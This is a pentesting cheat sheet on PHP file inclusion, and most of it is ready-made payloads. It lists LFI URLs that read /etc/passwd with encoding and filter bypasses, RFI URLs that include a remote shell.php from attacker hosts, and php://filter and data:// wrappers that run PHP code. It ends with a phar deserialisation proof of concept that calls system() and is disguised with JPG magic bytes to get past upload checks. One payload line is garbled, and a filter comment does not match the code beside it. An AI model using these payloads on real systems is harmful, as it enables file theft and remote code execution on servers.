File Inclusion

This happens when a user can control the file that is being loaded on the server.

Local File Inclusion (LFI)

The server loads a local file.

Basic LFI and bypasses

http://domain.com/index.php?page=../../../etc/passwd

URL encoding

One can try to URL encode the path either once or numerous times.

http://domain.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://domain.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://domain.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

Filter bypasses

http://domain.com/index.php?page=....//....//etc/passwd
http://domain.com/index.php?page=..///////..////..//////etc/passwd
http://domain.com/index.php?page=PhP://filter

Remote File Inclusion (RFI)

The server loads a file which is hosted on another server. RFI can only take place if allow_url_include is turned on.

Basic RFI and bypasses

http://domain.com/index.php?page=http://remote.com/shell.php
http://domain.com/index.php?page=\\remote.com\shell.phpattacker.com\mal.php

PHP wrappers

php://filter

PHP filters allow one to perform modification on data before it's being read by the server. Some of the techniques below can be used to bypass restrictions and filters set by the server.

# BASE64 encode data
http://domain.com/index.php?page=php://filter/convert.base64-decode/resource=/etc/passwd);

data://

http://domain.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://domain.com/?page=data://text/plain,<?php phpinfo(); ?>

phar:// and phar deserialisation

A .phar file is a PHP archive. One can upload such file and execute code when it is being loaded. It contains metadata in a serialised format. When parsed on the server said metadata gets deserialised.

Even if the source code on the server is not using the eval function, the following other methods will still invoke the vulnerability. file_get_contents(),fopen(),file(),file_exists(),md5_file(),filemtime(),filesize()

• More detail

Exploitation

1. Pretend that this is the source code of the server.

   # server.php
   <?php
   class ReadFile{
   	public $data = null;
   	
   	public function __construct($data) {
   		$this->data = $data;
   	}
   	
   	function __destruct() {
   		system($this->data);
   	}
   }
   
   file_get_contents("phar://pwned.phar");
   
   ?>

2. This is the code that will make the phar file.

   # make_phar.php
   <?php
   class ReadFile{
   	public $data = null;
   	
   	public function __construct($data) {
   		$this->data = $data;
   	}
   	
   	function __destruct() {
   		system($this->data);
   	}
   }
   
   # Make phar
   $phar = new Phar('pwned.phar');
   $phar->startBuffering();
   $phar->addFromString('test.txt', 'text');
   $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
   
   # Add object of class as metadata
   $object = new ReadFile('whoami');
   $phar->setMetadata($object);
   $phar->stopBuffering();
   ?>

Magic bytes of JPG \xff\xd8\xff have been added to the phar file to bypass file upload restrictions

1. Compile pwned.phar with:

   php --define phar.readonly=0 make_phar.php

References

• https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization